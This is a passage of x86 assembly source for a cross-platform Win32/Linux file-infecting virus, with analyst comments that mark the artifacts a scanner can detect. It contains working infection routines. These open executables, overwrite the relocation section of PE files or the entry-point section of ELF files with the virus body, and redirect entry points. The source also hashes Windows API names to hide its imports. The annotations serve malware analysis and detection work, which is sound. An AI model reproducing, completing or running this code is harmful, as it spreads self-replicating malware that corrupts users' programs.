📄 win32linux.winux源码part 2.txt
call lCheckInfect ;try to infect it
jmp inf_dir ;and look for another file
cldir: push 6
pop eax
int 80h ;close directory descriptor
popad
push 3
pop eax
lea ecx,[ebp + Start - lgdelta]
mov edi,ecx
mov edx,virtual_end-Start
int 80h ;restore host code
test eax,eax
js q_host
push 6
pop eax
int 80h ;close host file descriptor
add esp,end_end_lhost-end_lhost
mov [esp.cPushad],edi ;write host entrypoint address
popad
ret ;and jump to there
;INFECT FILE (Linux version)
lCheckInfect Proc
; Analyst note: entered from the directory walk with eax = pointer to the
; candidate file name. Flow: open(O_RDWR) -> lseek(SEEK_END) to learn the size
; -> old_mmap(PROT_READ|PROT_WRITE, MAP_SHARED) -> dispatch on the magic:
; an ELF image is handed to lInfectELF by a jump, a PE image is handled inline.
; Artifacts of the PE path that a scanner can key on: the base-relocation data
; directory is zeroed, AddressOfEntryPoint is moved to the last section's
; VirtualAddress, and that section gains IMAGE_SCN_MEM_WRITE.
; c_mfile / c_file are shared exit points; lInfectELF jumps back to them.
pushad
xchg eax,ebx ;ebx = path for sys_open
push 5
pop eax ;eax = 5 = sys_open
cdq ;eax is positive, so edx = 0
inc edx
inc edx ;edx = 2 (O_RDWR)
mov ecx,edx ;ecx = flags = O_RDWR; edx doubles as the mode argument
int 80h ;open file
xchg eax,ebx ;ebx = descriptor, or -errno on failure
test ebx,ebx
jns c_open
popad
ret ;open failed: give up on this file silently
c_open: mov [ebp + f_handle - lgdelta],ebx
push 19
pop eax ;eax = 19 = sys_lseek
xor ecx,ecx ;offset 0; edx is still 2 from above, i.e. SEEK_END
int 80h ;seek to EOF = get file size
mov [ebp + l_lseek - lgdelta],eax
;save it
; Build the 6-dword old_mmap argument block on the stack (lowest address first):
; addr=0, len=file size, prot=3 (PROT_READ|PROT_WRITE), flags=1 (MAP_SHARED), fd, offset=0
push ecx ;offset = 0
push ebx ;fd
inc ecx
push ecx ;flags = 1 (MAP_SHARED)
inc ecx
inc ecx
push ecx ;prot = 3 (PROT_READ|PROT_WRITE)
push eax ;len = file size from lseek
xor ecx,ecx
push ecx ;addr = 0
mov ebx,esp ;old_mmap takes a pointer to the argument block
push 90
pop eax ;eax = 90 = sys_mmap (old_mmap)
int 80h ;map file to address space
add esp,24 ;drop the 6-dword argument block
cmp eax,0FFFFF000h
jbe c_mmap ;continue if mapping succeeded (results above 0FFFFF000h are -errno)
jmp c_file ;mapping failed: just close the descriptor
c_mmap: mov ecx,eax ;ecx = mapping base
mov [ebp + fm_handle - lgdelta],eax
pushad
call check_elf ;ZF=1 when [ecx] is 7Fh 'ELF'
je lInfectELF ;is it Linux program (ELF)? (jump, not call; ELF path exits via c_mfile/c_file)
add ax,IMAGE_DOS_SIGNATURE ;ZF test on the 'MZ' word; presumably IMAGE_DOS_SIGNATURE is defined negated in this file - confirm against the equates
jne c_mfile
call check_pe ;leaves esi = NT headers, ZF = signature match
jne c_mfile ;is it Win32 program (PE)?
;some important chex
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne c_mfile ;only i386 images
mov ax,[esi.NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
je c_mfile ;must be marked executable
test ax,IMAGE_FILE_DLL
jne c_mfile ;DLLs are skipped
test ax,IMAGE_FILE_SYSTEM
jne c_mfile ;system images are skipped
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
test al,IMAGE_SUBSYSTEM_NATIVE
jne c_mfile ;native-subsystem images are skipped
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax ;eax = index of the last section
test eax,eax
je c_mfile ;a single-section image is skipped
call header&relocs ;get PE headerz and check for relocs (edi = last section header, edx = &BaseReloc dir, eax = its VA)
je c_mfile ;quit if no relocs
mov ebx,[edi.SH_VirtualAddress]
cmp eax,ebx
jne c_mfile ;the reloc directory must begin exactly at the last section
cmp [edi.SH_SizeOfRawData],virus_end-Start+500
jb c_mfile ;is it large enough?
pushad
xor eax,eax
mov edi,edx
stosd
stosd
popad ;clear relocs record (zeroes both dwords of the BaseReloc data directory)
call set_alignz ;align section variable
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ebx ;entry point redirected to the last section's VA
mov [ebp + original_ep - lgdelta],eax ;original entry point kept for the host-return path
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
mov [ebp + image_base - lgdelta],eax
;set some important variablez
pushad
mov edi,[edi.SH_PointerToRawData]
add edi,[esp+24] ;[esp+24] = the ecx slot saved by the pushad just above
lea esi,[ebp + Start - lgdelta]
mov ecx,virus_end-Start ;only the initialised part of the image is copied
rep movsb ;overwrite relocs by virus code
popad
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
;set flag (the last section becomes writable - a scanner-visible change)
c_mfile:popad
push 91
pop eax ;eax = 91 = sys_munmap, ebx/ecx as restored by popad
int 80h ;unmap file
c_file: push 6
pop eax ;eax = 6 = sys_close
mov ebx,[ebp + f_handle - lgdelta]
int 80h ;close file descriptor
popad
ret ;and quit
lCheckInfect EndP
;INFECT LINUX PROGRAM (Linux version)
lInfectELF Proc
; Analyst note: reached only by the `je lInfectELF` jump in lCheckInfect, with
; ecx = mapping base and lCheckInfect's two pushad frames still on the stack.
; It never returns; every exit jumps back to c_mfile or c_file in lCheckInfect.
; Header offsets below are the Elf32_Ehdr / Elf32_Shdr field offsets
; (e_machine 12h, e_entry 18h, e_shoff 20h, e_shentsize 2Eh, e_shnum 30h;
; sh_addr 0Ch, sh_offset 10h, sh_size 14h).
; Artifacts visible to a scanner: e_entry advanced by LinuxStart-Start, the
; section holding the entry point overwritten with the virus body, and a copy
; of the displaced bytes appended at end of file (the host grows).
mov edi,ecx ;edi = ELF image base
movzx eax,word ptr [edi+12h] ;e_machine
cmp eax,3 ;3 = EM_386
jne c_mfile
call get_elf ;get ELF headerz (ebx = e_entry, esi = first Shdr, edx = e_shentsize, ecx = e_shnum)
p_sectionz2:
mov eax,[esi+0Ch] ;virtual address (sh_addr)
add eax,[esi+14h] ;virtual size (sh_size)
cmp ebx,eax
jb got_section2 ;does EP fit to this section? (only the upper bound is tested)
add esi,edx ;no, get to next record
loop p_sectionz2 ;ECX-timez
jmp c_mfile ;invalid ELF, quit
got_section2:
mov eax,[ebp + Start - lgdelta] ;first dword of the virus body
mov ecx,[esi+10h] ;sh_offset
add ecx,edi ;file pointer of the section data
cmp [ecx],eax
je c_mfile ;infection check: already carries the body's first dword
mov eax,[esi+14h] ;sh_size
cmp eax,virtual_end-Start
jb c_mfile ;is it large enough? (needs room for the uninitialised area too)
sub esp,eax ;create buffer in stack
mov [ebp + s_mem - lgdelta],eax ;remember the buffer size for the stack fix-up below
add dword ptr [edi+18h],LinuxStart-Start ;e_entry += LinuxStart-Start
mov ecx,[esi+14h] ;sh_size bytes to save
mov esi,[esi+10h]
add esi,edi ;esi = section data in the mapping
mov eax,esi ;keep the section pointer for the second copy
mov edi,esp
rep movsb ;copy original host code there
mov edi,eax
lea esi,[ebp + Start - lgdelta]
mov ecx,virtual_end-Start
rep movsb ;overwrite host code by virus
push 91
pop eax ;eax = 91 = sys_munmap
mov ebx,[ebp + fm_handle - lgdelta]
int 80h ;unmap file
push 19
pop eax ;eax = 19 = sys_lseek
mov ebx,[ebp + f_handle - lgdelta]
xor ecx,ecx ;offset 0
cdq
inc edx
inc edx ;edx = 2 = SEEK_END
int 80h ;go to EOF
push 4
pop eax ;eax = 4 = sys_write
mov ecx,esp ;buffer = saved section bytes on the stack
mov edx,virtual_end-Start ;length written (note: not s_mem)
int 80h ;write there original host code
add esp,[ebp + s_mem - lgdelta] ;release the stack buffer
popad ;correct stack
jmp c_file ;and close the file
lInfectELF EndP
;check if it is Linux program (ELF)
check_elf Proc
; In:  ecx = mapping base
; Out: ZF = 1 when the first dword is 464C457Fh (7Fh 'E' 'L' 'F'); eax is
;      restored by the push/pop, so only the flags carry the result.
mov eax,[ecx]
push eax
add eax,-464C457Fh ;add the negated magic: result is zero exactly on a match
pop eax
ret
check_elf EndP
;check if it is Win32 program (PE)
check_pe Proc
; In:  ecx = mapping base (MZ header)
; Out: esi = ecx + e_lfanew (NT headers), eax = [esi] + IMAGE_NT_SIGNATURE,
;      ZF = signature match. Presumably IMAGE_NT_SIGNATURE is defined as the
;      negated 'PE\0\0' in this file, mirroring check_elf's literal - confirm
;      against the equates.
mov eax,[ecx.MZ_lfanew]
add eax,ecx
xchg eax,esi
mov eax,[esi]
add eax,IMAGE_NT_SIGNATURE
ret
check_pe EndP
;get some variablez and check for relocationz in PE file
header&relocs Proc
; In:  eax = NumberOfSections-1, esi = NT headers
; Out: edi = last section header
;        (esi + 4 [signature] + IMAGE_SIZEOF_FILE_HEADER + SizeOfOptionalHeader
;         + eax*IMAGE_SIZEOF_SECTION_HEADER),
;      edx = address of the BaseReloc data directory entry,
;      eax = its VirtualAddress, ZF = 1 when there is no reloc directory.
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
add edi,esi
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
mov eax,[edx]
test eax,eax
ret
header&relocs EndP
;align section variable
set_alignz Proc
; In:  edi = section header, esi = NT headers
; Out: if virtual_end-Start already fits in SH_VirtualSize nothing is touched;
;      otherwise SH_VirtualSize is raised to virtual_end-Start rounded up to
;      OH_SectionAlignment. On that path ecx and edx are clobbered (div/mul).
mov eax,virtual_end-Start
cmp eax,[edi.SH_VirtualSize]
jb o_vs ;current VirtualSize is already big enough
mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
cdq ;edx = 0 for the unsigned-range eax (div needs edx:eax)
div ecx
test edx,edx
je o_al ;exact multiple: no extra unit
inc eax
o_al: mul ecx ;eax = units * alignment (mul writes edx too)
mov [edi.SH_VirtualSize],eax
o_vs: ret
set_alignz EndP
;get some important variablez from Linux program (ELF)
get_elf Proc
; In:  edi = ELF image base
; Out: ebx = e_entry, esi = first section header (e_shoff + base),
;      edx = e_shentsize, ecx = e_shnum. Offsets are the Elf32_Ehdr fields.
mov ebx,[edi+18h] ;EP (e_entry)
mov esi,[edi+20h] ;section header (e_shoff)
add esi,edi ;normalize
movzx edx,word ptr [edi+2Eh] ;size of section header (e_shentsize)
movzx ecx,word ptr [edi+30h] ;number of sectionz (e_shnum)
ret
get_elf EndP
end_end_lhost:
end_lhost EndP
gpl db 'This GNU program is covered by GPL.',0
;licence agreement ;-)
; Analyst note: this string lies inside the copied image (before virus_end),
; so it is a stable static string for detection.
;CRC32s of used APIz
; Win32 imports are resolved by CRC32 of the export name rather than by the
; plain-text name; the table order matches the a_* slots below.
crc32s: dd 0AE17EBEFh ;FindFirstFileA
dd 0AA700106h ;FindNextFileA
dd 0C200BE21h ;FindClose
dd 08C892DDFh ;CreateFileA
dd 096B2D96Ch ;CreateFileMappingA
dd 0797B49ECh ;MapViewOfFile
dd 094524B42h ;UnmapViewOfFile
dd 068624A9Dh ;CloseHandle
dd 04402890Eh ;VirtualAlloc
dd 02AAD1211h ;VirtualFree
dd 021777793h ;WriteFile
dd 085859D42h ;SetFilePointer
dd 0EBC6C18Bh ;GetCurrentDirectoryA
dd 0B2DBD7DCh ;SetCurrentDirectoryA
dd 07495B3ADh ;OutputDebugStringA
crc32c = ($-crc32s)/4 ;number of APIz
virus_end:
; virus_end marks the end of the bytes copied into PE hosts (virus_end-Start);
; everything from here to virtual_end is uninitialised working storage that
; must still fit in the host section (the ELF path checks virtual_end-Start).
;addresses of APIz
a_apis:
a_FindFirstFileA dd ?
a_FindNextFileA dd ?
a_FindClose dd ?
a_CreateFileA dd ?
a_CreateFileMappingA dd ?
a_MapViewOfFile dd ?
a_UnmapViewOfFile dd ?
a_CloseHandle dd ?
a_VirtualAlloc dd ?
a_VirtualFree dd ?
a_WriteFile dd ?
a_SetFilePointer dd ?
a_GetCurrentDirectoryA dd ?
a_SetCurrentDirectoryA dd ?
a_OutputDebugStringA dd ?
f_handle dd ? ;file handle (Linux: descriptor from sys_open)
fm_handle dd ? ;file mapping handle (Linux: mmap base address)
s_mem dd ? ;size of host code (for stack manipulationz)
WFD WIN32_FIND_DATA ? ;WIN32_FIND_DATA structure
prev_dir db MAX_PATH dup (?);original directory
virtual_end:
ends
End Start ;that's all folx, wasn't that kewl? ;-)